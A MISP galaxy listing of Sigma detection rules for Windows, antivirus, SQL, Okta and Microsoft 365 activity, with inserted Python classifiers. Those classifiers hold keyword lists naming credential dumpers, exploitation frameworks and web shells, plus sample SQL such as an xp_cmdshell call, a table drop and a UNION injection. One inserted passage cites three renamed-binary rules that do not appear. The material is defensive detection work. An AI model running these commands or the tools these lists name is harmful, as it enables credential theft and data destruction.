Suspicious Control Panel DLL Load

Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits

Internal MISP references

UUID d7eb979b-c2b5-4a6f-a3a7-c87ce6763819 which can be used as unique global reference for Suspicious Control Panel DLL Load in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/04/15
falsepositive ['Unknown']
filename proc_creation_win_rundll32_susp_control_dll_load.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.011']
Related clusters

To see the related clusters, click here.

Renamed PingCastle Binary Execution

Detects the execution of a renamed "PingCastle" binary based on the PE metadata fields.

Internal MISP references

UUID 2433a154-bb3d-42e4-86c3-a26bdac91c45 which can be used as unique global reference for Renamed PingCastle Binary Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
creation_date 2024/01/11
falsepositive ['Unknown']
filename proc_creation_win_renamed_pingcastle.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059', 'attack.defense_evasion', 'attack.t1202']
Related clusters

To see the related clusters, click here.
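The four "renamed binary" rules above (Renamed Office Binary Execution, Renamed ProcDump Execution, Renamed CURL.EXE Execution and Renamed PingCastle Binary Execution) share one idea: the file name on disk is compared against the OriginalFileName field embedded in the executable's version resource, which survives a rename. The Python below is an added example for this page, not the logic of any of those rules. It compares the image stem with the OriginalFileName stem and consults a watchlist of expected names, so that a legitimately named `procdump64.exe` whose metadata says `procdump` is not flagged. The watchlist entries, the metadata values in the sample events and the event field names are assumptions of the example; the real PE metadata of these products is not asserted here.

```python
# Expected image stems for each OriginalFileName stem (constructed watchlist).
WATCHLIST = {
    "procdump": ("ProcDump", {"procdump", "procdump64", "procdump64a"}),
    "curl": ("curl", {"curl"}),
    "pingcastle": ("PingCastle", {"pingcastle"}),
    "winword": ("Microsoft Office", {"winword"}),
    "excel": ("Microsoft Office", {"excel"}),
    "powerpnt": ("Microsoft Office", {"powerpnt"}),
}

# Constructed sample process-creation events (not real telemetry).
SAMPLE_EVENTS = [
    {"Image": r"C:\Users\bob\AppData\Local\Temp\svchost.exe", "OriginalFileName": "procdump"},
    {"Image": r"C:\Tools\procdump64.exe", "OriginalFileName": "procdump"},
    {"Image": r"C:\ProgramData\update.exe", "OriginalFileName": "curl.exe"},
    {"Image": r"C:\Windows\System32\curl.exe", "OriginalFileName": "curl.exe"},
    {"Image": r"D:\audit\pc.exe", "OriginalFileName": "PingCastle.exe"},
    {"Image": r"C:\Users\bob\Downloads\notes.exe", "OriginalFileName": "WinWord.exe"},
    {"Image": r"C:\Users\bob\Downloads\notes.exe", "OriginalFileName": "?"},
]


def _stem(name):
    """Lower-case file name without directory and without a .exe suffix."""
    base = name.rsplit("\\", 1)[-1].lower()
    return base[:-4] if base.endswith(".exe") else base


def renamed_binary(event):
    """Return the tool label, image and metadata name when a watch-listed
    OriginalFileName runs under an unexpected file name, else None."""
    original = event.get("OriginalFileName", "")
    if not original or original == "?":          # metadata absent or not logged
        return None
    orig_stem = _stem(original)
    if orig_stem not in WATCHLIST:
        return None
    label, expected = WATCHLIST[orig_stem]
    if _stem(event["Image"]) in expected:
        return None
    return {"tool": label, "image": event["Image"].rsplit("\\", 1)[-1],
            "original_file_name": original}


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["Image"], "->", renamed_binary(ev))
```

The obvious evasion is to patch the version resource as well, which is why the rules above pair OriginalFileName with other PE fields; a missing or "?" OriginalFileName on a tool that normally carries one is itself a weak signal worth a lower-severity rule.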

Potential Provlaunch.EXE Binary Proxy Execution Abuse

Detects child processes of "provlaunch.exe" which might indicate potential abuse to proxy execution.

Internal MISP references

UUID 7f5d1c9a-3e83-48df-95a7-2b98aae6c13c which can be used as unique global reference for Potential Provlaunch.EXE Binary Proxy Execution Abuse in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel
creation_date 2023/08/08
falsepositive ['Unknown']
filename proc_creation_win_provlaunch_potential_abuse.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Antivirus Password Dumper Detection

Detects a highly relevant Antivirus alert that reports a password dumper

Internal MISP references

UUID 78cc2dd2-7d20-4d32-93ff-057084c38b93 which can be used as unique global reference for Antivirus Password Dumper Detection in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2018/09/09
falsepositive ['Unlikely']
filename av_password_dumper.yml
level critical
logsource.category antivirus
logsource.product No established product
tags ['attack.credential_access', 'attack.t1003', 'attack.t1558', 'attack.t1003.001', 'attack.t1003.002']
Related clusters

To see the related clusters, click here.

Antivirus Relevant File Paths Alerts

Detects an Antivirus alert in a highly relevant file path or with a relevant file name

Internal MISP references

UUID c9a88268-0047-4824-ba6e-4d81ce0b907c which can be used as unique global reference for Antivirus Relevant File Paths Alerts in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Arnim Rupp
creation_date 2018/09/09
falsepositive ['Unlikely']
filename av_relevant_files.yml
level high
logsource.category antivirus
logsource.product No established product
tags ['attack.resource_development', 'attack.t1588']
Related clusters

To see the related clusters, click here.

Antivirus Exploitation Framework Detection

Detects a highly relevant Antivirus alert that reports an exploitation framework

Internal MISP references

UUID 238527ad-3c2c-4e4f-a1f6-92fd63adb864 which can be used as unique global reference for Antivirus Exploitation Framework Detection in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Arnim Rupp
creation_date 2018/09/09
falsepositive ['Unlikely']
filename av_exploiting.yml
level critical
logsource.category antivirus
logsource.product No established product
tags ['attack.execution', 'attack.t1203', 'attack.command_and_control', 'attack.t1219']
Related clusters

To see the related clusters, click here.

Antivirus Hacktool Detection

Detects a highly relevant Antivirus alert that reports a hack tool or other attack tool

Internal MISP references

UUID fa0c05b6-8ad3-468d-8231-c1cbccb64fba which can be used as unique global reference for Antivirus Hacktool Detection in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Arnim Rupp
creation_date 2021/08/16
falsepositive ['Unlikely']
filename av_hacktool.yml
level high
logsource.category antivirus
logsource.product No established product
tags ['attack.execution', 'attack.t1204']
Related clusters

To see the related clusters, click here.

Antivirus Web Shell Detection

Detects a highly relevant Antivirus alert that reports a web shell. It is highly recommended to tune this rule to the specific strings used by your antivirus solution, for example by downloading a large web shell repository from GitHub and checking which signature names it triggers.

Internal MISP references

UUID fdf135a2-9241-4f96-a114-bb404948f736 which can be used as unique global reference for Antivirus Web Shell Detection in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Arnim Rupp
creation_date 2018/09/09
falsepositive ['Unlikely']
filename av_webshell.yml
level high
logsource.category antivirus
logsource.product No established product
tags ['attack.persistence', 'attack.t1505.003']
Related clusters

To see the related clusters, click here.

Antivirus Ransomware Detection

Detects a highly relevant Antivirus alert that reports ransomware

Internal MISP references

UUID 4c6ca276-d4d0-4a8c-9e4c-d69832f8671f which can be used as unique global reference for Antivirus Ransomware Detection in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Arnim Rupp
creation_date 2022/05/12
falsepositive ['Unlikely']
filename av_ransomware.yml
level critical
logsource.category antivirus
logsource.product No established product
tags ['attack.t1486']
Related clusters

To see the related clusters, click here.
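The five antivirus rules above all work the same way: the signature name reported by the AV engine is matched against keyword lists, and the alert is escalated to the level shown in each rule's metadata. As an added example for this page (not the rules' own keyword lists), the Python below classifies constructed alerts into those categories, checking the more specific categories first so that a signature such as "HackTool:Win32/Mimikatz" lands on "password dumper" rather than the generic "hacktool", and falls back to the file-path check of Antivirus Relevant File Paths Alerts. The keyword and path lists are deliberately short starting points, which is exactly where the tuning advice above applies; signature names follow a Defender-like style but are constructed.

```python
# Category keyword lists, most specific first (constructed starting points;
# extend them with the naming scheme of your own AV vendor).
CATEGORIES = [
    ("password_dumper", "critical",
     ("mimikatz", "pwdump", "dumpcreds", "lsassdump", "samdump", "dumper")),
    ("exploitation_framework", "critical",
     ("metasploit", "meterpreter", "cobaltstrike", "cobalt strike", "powersploit", "sliver")),
    ("ransomware", "critical", ("ransom", "filecoder", "cryptolocker", "lockbit")),
    ("webshell", "high", ("webshell", "chopper", "c99shell", "r57", "aspxspy")),
    ("hacktool", "high", ("hacktool", "hktl")),
]
# Locations where any detection deserves attention (constructed list).
RELEVANT_PATHS = ("\\inetpub\\wwwroot\\", "\\windows\\temp\\", "\\users\\public\\")

# Constructed sample alerts in a vendor-neutral shape (not real AV output).
SAMPLE_ALERTS = [
    {"signature": "HackTool:Win32/Mimikatz.E", "path": r"C:\Users\bob\Downloads\m.exe"},
    {"signature": "Trojan:Win32/Meterpreter.A", "path": r"C:\Users\bob\AppData\Local\Temp\a.exe"},
    {"signature": "Ransom:Win32/LockBit.A", "path": r"C:\ProgramData\lb.exe"},
    {"signature": "Backdoor:PHP/WebShell.B", "path": r"C:\inetpub\wwwroot\up.php"},
    {"signature": "HackTool:Win32/Keygen", "path": r"C:\Users\bob\Downloads\k.exe"},
    {"signature": "Trojan:Win32/Generic", "path": r"C:\inetpub\wwwroot\img.aspx"},
    {"signature": "Adware:Win32/Foo", "path": r"C:\Users\bob\Downloads\setup.exe"},
]


def classify_alert(alert):
    """Return the matching category and alert level, or None when the alert
    is neither a listed threat class nor in a relevant location."""
    sig = alert.get("signature", "").lower()
    for category, level, keywords in CATEGORIES:
        if any(k in sig for k in keywords):
            return {"category": category, "level": level}
    path = alert.get("path", "").lower()
    if any(p in path for p in RELEVANT_PATHS):
        return {"category": "relevant_path", "level": "high"}
    return None


if __name__ == "__main__":
    for alert in SAMPLE_ALERTS:
        print(alert["signature"], "->", classify_alert(alert))
```

Ordering matters: "ransom" is checked before "hacktool" and "webshell" so that, for example, a ransomware family labelled as a hacktool by one vendor still gets the critical level the Antivirus Ransomware Detection rule assigns.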

Suspicious SQL Query

Detects suspicious SQL query keywords that are often used during reconnaissance, exfiltration or destructive activities, such as dropping tables and selecting wildcard fields.

Internal MISP references

UUID d84c0ded-edd7-4123-80ed-348bb3ccc4d5 which can be used as unique global reference for Suspicious SQL Query in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @juju4
creation_date 2022/12/27
falsepositive ['Inventory and monitoring activity', 'Vulnerability scanners', 'Legitimate applications']
filename db_anomalous_query.yml
level medium
logsource.category database
logsource.product No established product
tags ['attack.exfiltration', 'attack.initial_access', 'attack.privilege_escalation', 'attack.t1190', 'attack.t1505.001']
Related clusters

To see the related clusters, click here.
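An added example for this page (not the Sigma rule's keyword list): the Python below classifies constructed SQL statements into the activity classes the description names (destructive statements, wildcard selects) plus schema reconnaissance, OS command execution and UNION-based injection. String literals and comments are masked before matching, so a query that merely stores the text `DROP TABLE users` in a column is not flagged, and `count(*)` is not mistaken for a wildcard select. The keyword patterns and severity mapping are assumptions of the example.

```python
import re

# Masking helpers: keywords inside string literals or comments are not queries.
STRING_LITERAL = re.compile(r"'(?:[^']|'')*'")
COMMENT = re.compile(r"--[^\n]*|/\*.*?\*/", re.S)

# Activity classes, each with a pattern applied to the masked statement.
PATTERNS = [
    ("destructive", re.compile(r"\b(?:drop\s+(?:table|database|schema)|truncate\s+table)\b", re.I)),
    ("os_command", re.compile(r"\bxp_cmdshell\b|\binto\s+(?:outfile|dumpfile)\b", re.I)),
    ("schema_recon", re.compile(r"\binformation_schema\.|\bsys\.(?:tables|columns|databases)\b|\bsysobjects\b", re.I)),
    ("wildcard_select", re.compile(r"\bselect\s+(?:top\s+\d+\s+)?\*", re.I)),
    ("union_injection", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
]
SEVERITY = {"destructive": "high", "os_command": "high",
            "schema_recon": "medium", "wildcard_select": "medium", "union_injection": "medium"}

# Constructed sample statements (not real database logs).
SAMPLE_QUERIES = [
    "SELECT * FROM customers",
    "DROP TABLE audit_log; -- cleanup",
    "SELECT name FROM notes WHERE body = 'DROP TABLE users'",
    "SELECT table_name FROM information_schema.tables",
    "SELECT id FROM users WHERE id = 1 UNION SELECT * FROM credentials",
    "SELECT count(*) FROM orders",
    "EXEC xp_cmdshell 'whoami'",
]


def classify_query(sql):
    """Return the list of activity classes a statement matches (may be empty)."""
    masked = STRING_LITERAL.sub("''", sql)       # literals first, then comments
    masked = COMMENT.sub(" ", masked)
    return [name for name, rx in PATTERNS if rx.search(masked)]


def query_severity(sql):
    """Highest severity among the matched classes, or None."""
    classes = classify_query(sql)
    if not classes:
        return None
    return "high" if any(SEVERITY[c] == "high" for c in classes) else "medium"


if __name__ == "__main__":
    for q in SAMPLE_QUERIES:
        print(q, "->", classify_query(q), query_severity(q))
```

The rule's listed false positives (inventory tooling, vulnerability scanners) mostly generate the medium-severity classes; suppressing them by application account rather than by loosening the patterns keeps the destructive and OS-command classes intact.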

Okta FastPass Phishing Detection

Detects when Okta FastPass prevents a known phishing site.

Internal MISP references

UUID ee39a9f7-5a79-4b0a-9815-d36b3cf28d3e which can be used as unique global reference for Okta FastPass Phishing Detection in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2023/05/07
falsepositive ['Unlikely']
filename okta_fastpass_phishing_detection.yml
level high
logsource.category No established category
logsource.product okta
tags ['attack.initial_access', 'attack.t1566']
Related clusters

To see the related clusters, click here.

Okta Security Threat Detected

Detects when a security threat is detected in Okta.

Internal MISP references

UUID 5c82f0b9-3c6d-477f-a318-0e14a1df73e0 which can be used as unique global reference for Okta Security Threat Detected in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/09/12
falsepositive ['Unknown']
filename okta_security_threat_detected.yml
level medium
logsource.category No established category
logsource.product okta
tags ['attack.command_and_control']

Okta New Admin Console Behaviours

Detects when Okta identifies new activity in the Admin Console.

Internal MISP references

UUID a0b38b70-3cb5-484b-a4eb-c4d8e7bcc0a9 which can be used as unique global reference for Okta New Admin Console Behaviours in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author kelnage
creation_date 2023/09/07
falsepositive ['Whenever an admin starts using new features of the admin console.']
filename okta_new_behaviours_admin_console.yml
level low
logsource.category No established category
logsource.product okta
tags ['attack.initial_access', 'attack.t1078.004']
Related clusters

To see the related clusters, click here.

Okta Suspicious Activity Reported by End-user

Detects when an Okta end-user reports activity by their account as being potentially suspicious.

Internal MISP references

UUID 07e97cc6-aed1-43ae-9081-b3470d2367f1 which can be used as unique global reference for Okta Suspicious Activity Reported by End-user in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author kelnage
creation_date 2023/09/07
falsepositive ['If an end-user incorrectly identifies normal activity as suspicious.']
filename okta_suspicious_activity_enduser_report.yml
level high
logsource.category No established category
logsource.product okta
tags ['attack.resource_development', 'attack.t1586.003']
Related clusters

To see the related clusters, click here.

Okta User Account Locked Out

Detects when a user account is locked out.

Internal MISP references

UUID 14701da0-4b0f-4ee6-9c95-2ffb4e73bb9a which can be used as unique global reference for Okta User Account Locked Out in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/09/12
falsepositive ['Unknown']
filename okta_user_account_locked_out.yml
level medium
logsource.category No established category
logsource.product okta
tags ['attack.impact', 'attack.t1531']
Related clusters

To see the related clusters, click here.

Okta Identity Provider Created

Detects when a new identity provider is created for Okta.

Internal MISP references

UUID 969c7590-8c19-4797-8c1b-23155de6e7ac which can be used as unique global reference for Okta Identity Provider Created in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author kelnage
creation_date 2023/09/07
falsepositive ['When an admin creates a new, authorised identity provider.']
filename okta_identity_provider_created.yml
level medium
logsource.category No established category
logsource.product okta
tags ['attack.persistence', 'attack.t1098.001']
Related clusters

To see the related clusters, click here.

Okta API Token Revoked

Detects when an API token is revoked.

Internal MISP references

UUID cf1dbc6b-6205-41b4-9b88-a83980d2255b which can be used as unique global reference for Okta API Token Revoked in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/09/12
falsepositive ['Unknown']
filename okta_api_token_revoked.yml
level medium
logsource.category No established category
logsource.product okta
tags ['attack.impact']

Okta Policy Rule Modified or Deleted

Detects when a policy rule is modified or deleted.

Internal MISP references

UUID 0c97c1d3-4057-45c9-b148-1de94b631931 which can be used as unique global reference for Okta Policy Rule Modified or Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/09/12
falsepositive ['Unknown']
filename okta_policy_rule_modified_or_deleted.yml
level medium
logsource.category No established category
logsource.product okta
tags ['attack.impact']

Okta Unauthorized Access to App

Detects when unauthorized access to an application occurs.

Internal MISP references

UUID 6cc2b61b-d97e-42ef-a9dd-8aa8dc951657 which can be used as unique global reference for Okta Unauthorized Access to App in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/09/12
falsepositive ['The user might have believed that they had access.']
filename okta_unauthorized_access_to_app.yml
level medium
logsource.category No established category
logsource.product okta
tags ['attack.impact']

Okta Application Sign-On Policy Modified or Deleted

Detects when an application Sign-on Policy is modified or deleted.

Internal MISP references

UUID 8f668cc4-c18e-45fe-ad00-624a981cf88a which can be used as unique global reference for Okta Application Sign-On Policy Modified or Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/09/12
falsepositive ['Unknown']
filename okta_application_sign_on_policy_modified_or_deleted.yml
level medium
logsource.category No established category
logsource.product okta
tags ['attack.impact']

Okta Admin Role Assignment Created

Detects when a new admin role assignment is created, which could be a sign of privilege escalation or persistence.

Internal MISP references

UUID 139bdd4b-9cd7-49ba-a2f4-744d0a8f5d8c which can be used as unique global reference for Okta Admin Role Assignment Created in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nikita Khalimonenkov
creation_date 2023/01/19
falsepositive ['Legitimate creation of a new admin role assignment']
filename okta_admin_role_assignment_created.yml
level medium
logsource.category No established category
logsource.product okta
tags ['attack.persistence']

Okta Admin Role Assigned to an User or Group

Detects when the Administrator role is assigned to a user or group.

Internal MISP references

UUID 413d4a81-6c98-4479-9863-014785fd579c which can be used as unique global reference for Okta Admin Role Assigned to an User or Group in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/09/12
falsepositive ['Administrator roles could be assigned to users or groups by other admin users.']
filename okta_admin_role_assigned_to_user_or_group.yml
level medium
logsource.category No established category
logsource.product okta
tags ['attack.persistence', 'attack.t1098.003']

New Okta User Created

Detects new user account creation

Internal MISP references

UUID b6c718dd-8f53-4b9f-98d8-93fdca966969 which can be used as unique global reference for New Okta User Created in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/10/25
falsepositive ['Legitimate and authorized user creation']
filename okta_user_created.yml
level informational
logsource.category No established category
logsource.product okta
tags ['attack.credential_access']

Okta Application Modified or Deleted

Detects when an application is modified or deleted.

Internal MISP references

UUID 7899144b-e416-4c28-b0b5-ab8f9e0a541d which can be used as unique global reference for Okta Application Modified or Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/09/12
falsepositive ['Unknown']
filename okta_application_modified_or_deleted.yml
level medium
logsource.category No established category
logsource.product okta
tags ['attack.impact']

Potential Okta Password in AlternateID Field

Detects when a user has potentially entered their password into the username field, which will cause the password to be retained in log files.

Internal MISP references

UUID 91b76b84-8589-47aa-9605-c837583b82a9 which can be used as unique global reference for Potential Okta Password in AlternateID Field in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author kelnage
creation_date 2023/04/03
falsepositive ['Unlikely']
filename okta_password_in_alternateid_field.yml
level high
logsource.category No established category
logsource.product okta
tags ['attack.credential_access', 'attack.t1552']

Okta Admin Functions Access Through Proxy

Detects access to Okta admin functions through a proxy.

Internal MISP references

UUID 9058ca8b-f397-4fd1-a9fa-2b7aad4d6309 which can be used as unique global reference for Okta Admin Functions Access Through Proxy in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Muhammad Faisal @faisalusuf
creation_date 2023/10/25
falsepositive ['False positives are expected if administrators access these functions through a proxy legitimately. Apply additional filters if necessary.']
filename okta_admin_activity_from_proxy_query.yml
level medium
logsource.category No established category
logsource.product okta
tags ['attack.credential_access']

Okta Network Zone Deactivated or Deleted

Detects when a network zone is deactivated or deleted.

Internal MISP references

UUID 9f308120-69ed-4506-abde-ac6da81f4310 which can be used as unique global reference for Okta Network Zone Deactivated or Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/09/12
falsepositive ['Unknown']
filename okta_network_zone_deactivated_or_deleted.yml
level medium
logsource.category No established category
logsource.product okta
tags ['attack.impact']

Okta API Token Created

Detects when an API token is created.

Internal MISP references

UUID 19951c21-229d-4ccb-8774-b993c3ff3c5c which can be used as unique global reference for Okta API Token Created in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/09/12
falsepositive ['Legitimate creation of an API token by authorized users']
filename okta_api_token_created.yml
level medium
logsource.category No established category
logsource.product okta
tags ['attack.persistence']

Okta MFA Reset or Deactivated

Detects an attempt at deactivating or resetting MFA.

Internal MISP references

UUID 50e068d7-1e6b-4054-87e5-0a592c40c7e0 which can be used as unique global reference for Okta MFA Reset or Deactivated in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/09/21
falsepositive ['If an MFA reset or deactivation was performed by a system administrator.']
filename okta_mfa_reset_or_deactivated.yml
level medium
logsource.category No established category
logsource.product okta
tags ['attack.persistence', 'attack.credential_access', 'attack.defense_evasion', 'attack.t1556.006']

Okta Policy Modified or Deleted

Detects when an Okta policy is modified or deleted.

Internal MISP references

UUID 1667a172-ed4c-463c-9969-efd92195319a which can be used as unique global reference for Okta Policy Modified or Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/09/12
falsepositive ['Okta Policies being modified or deleted may be performed by a system administrator.', 'Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'Okta Policies modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename okta_policy_modified_or_deleted.yml
level low
logsource.category No established category
logsource.product okta
tags ['attack.impact']

Okta User Session Start Via An Anonymising Proxy Service

Detects when an Okta user session starts where the user is behind an anonymising proxy service.

Internal MISP references

UUID bde30855-5c53-4c18-ae90-1ff79ebc9578 which can be used as unique global reference for Okta User Session Start Via An Anonymising Proxy Service in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author kelnage
creation_date 2023/09/07
falsepositive ['If a user requires an anonymising proxy due to valid justifications.']
filename okta_user_session_start_via_anonymised_proxy.yml
level high
logsource.category No established category
logsource.product okta
tags ['attack.defense_evasion', 'attack.t1562.006']

Disabling Multi Factor Authentication

Detects disabling of Multi Factor Authentication.

Internal MISP references

UUID 60de9b57-dc4d-48b9-a6a0-b39e0469f876 which can be used as unique global reference for Disabling Multi Factor Authentication in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Splunk Threat Research Team (original rule), Harjot Singh @cyb3rjy0t (sigma rule)
creation_date 2023/09/18
falsepositive ['Unlikely']
filename microsoft365_disabling_mfa.yml
level high
logsource.category No established category
logsource.product m365
tags ['attack.persistence', 'attack.t1556']

New Federated Domain Added

Detects the addition of a new Federated Domain.

Internal MISP references

UUID 58f88172-a73d-442b-94c9-95eaed3cbb36 which can be used as unique global reference for New Federated Domain Added in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Splunk Threat Research Team (original rule), Harjot Singh @cyb3rjy0t (sigma rule)
creation_date 2023/09/18
falsepositive ['The creation of a new Federated domain is not necessarily malicious; however, these events need to be followed closely, as they may indicate federated credential abuse or a backdoor via federated identities at a similar or different cloud provider.']
filename microsoft365_new_federated_domain_added_audit.yml
level medium
logsource.category No established category
logsource.product m365
tags ['attack.persistence', 'attack.t1136.003']

New Federated Domain Added - Exchange

Detects the addition of a new Federated Domain.

Internal MISP references

UUID 42127bdd-9133-474f-a6f1-97b6c08a4339 which can be used as unique global reference for New Federated Domain Added - Exchange in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Splunk Threat Research Team (original rule), @ionsor (rule)
creation_date 2022/02/08
falsepositive ['The creation of a new Federated domain is not necessarily malicious; however, these events need to be followed closely, as they may indicate federated credential abuse or a backdoor via federated identities at a similar or different cloud provider.']
filename microsoft365_new_federated_domain_added_exchange.yml
level medium
logsource.category No established category
logsource.product m365
tags ['attack.persistence', 'attack.t1136.003']

Activity from Anonymous IP Addresses

Detects when Microsoft Cloud App Security reports that users were active from an IP address that has been identified as an anonymous proxy IP address.

Internal MISP references

UUID d8b0a4fe-07a8-41be-bd39-b14afa025d95 which can be used as unique global reference for Activity from Anonymous IP Addresses in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/23
falsepositive ['User using a VPN or Proxy']
filename microsoft365_activity_from_anonymous_ip_addresses.yml
level medium
logsource.category No established category
logsource.product m365
tags ['attack.command_and_control', 'attack.t1573']

Data Exfiltration to Unsanctioned Apps

Detects when Microsoft Cloud App Security reports that a user or IP address uses an unsanctioned app to perform an activity that resembles an attempt to exfiltrate information from your organization.

Internal MISP references

UUID 2b669496-d215-47d8-bd9a-f4a45bf07cda which can be used as unique global reference for Data Exfiltration to Unsanctioned Apps in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/23
falsepositive ['Unknown']
filename microsoft365_data_exfiltration_to_unsanctioned_app.yml
level medium
logsource.category No established category
logsource.product m365
tags ['attack.exfiltration', 'attack.t1537']

Suspicious Inbox Forwarding

Detects when Microsoft Cloud App Security reports suspicious email forwarding rules, for example a user creating an inbox rule that forwards a copy of all emails to an external address.

Internal MISP references

UUID 6c220477-0b5b-4b25-bb90-66183b4089e8 which can be used as unique global reference for Suspicious Inbox Forwarding in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/22
falsepositive ['Unknown']
filename microsoft365_susp_inbox_forwarding.yml
level low
logsource.category No established category
logsource.product m365
tags ['attack.exfiltration', 'attack.t1020']

Activity Performed by Terminated User

Detects when Microsoft Cloud App Security reports activity by users whose accounts were terminated in Azure AD but who still perform activities in other platforms such as AWS or Salesforce. This is especially relevant for users who use another account to manage resources, since these accounts are often not terminated when a user leaves the company.

Internal MISP references

UUID 2e669ed8-742e-4fe5-b3c4-5a59b486c2ee which can be used as unique global reference for Activity Performed by Terminated User in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/23
falsepositive ['Unknown']
filename microsoft365_activity_by_terminated_user.yml
level medium
logsource.category No established category
logsource.product m365
tags ['attack.impact']

Logon from a Risky IP Address

Detects when Microsoft Cloud App Security reports that a user signed into your sanctioned apps from a risky IP address.

Internal MISP references

UUID c191e2fa-f9d6-4ccf-82af-4f2aba08359f which can be used as unique global reference for Logon from a Risky IP Address in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/23
falsepositive ['Unknown']
filename microsoft365_logon_from_risky_ip_address.yml
level medium
logsource.category No established category
logsource.product m365
tags ['attack.initial_access', 'attack.t1078']

PST Export Alert Using New-ComplianceSearchAction

Alerts when a user has performed an export of a search using 'New-ComplianceSearchAction' with the '-Export' flag. This detection catches PST exports even if the 'eDiscovery search or exported' alert is disabled in O365. This rule applies to ExchangePowerShell usage and to the cloud.

Internal MISP references

UUID 6897cd82-6664-11ed-9022-0242ac120002 which can be used as unique global reference for PST Export Alert Using New-ComplianceSearchAction in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nikita Khalimonenkov
creation_date 2022/11/17
falsepositive ['Exporting a PST can be done for legitimate purposes by legitimate sources, but due to the sensitive nature of PST content, it must be monitored.']
filename microsoft365_pst_export_alert_using_new_compliancesearchaction.yml
level medium
logsource.category No established category
logsource.product m365
tags ['attack.collection', 'attack.t1114']

Microsoft 365 - Unusual Volume of File Deletion

Detects when Microsoft Cloud App Security reports that a user has deleted an unusually large volume of files.

Internal MISP references

UUID 78a34b67-3c39-4886-8fb4-61c46dc18ecd which can be used as unique global reference for Microsoft 365 - Unusual Volume of File Deletion in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author austinsonger
creation_date 2021/08/19
falsepositive ['Unknown']
filename microsoft365_unusual_volume_of_file_deletion.yml
level medium
logsource.category No established category
logsource.product m365
tags ['attack.impact', 'attack.t1485']

Microsoft 365 - User Restricted from Sending Email

Detects when the Security Compliance Center reports a user who exceeded the sending limits of the service policies and has therefore been restricted from sending email.

Internal MISP references

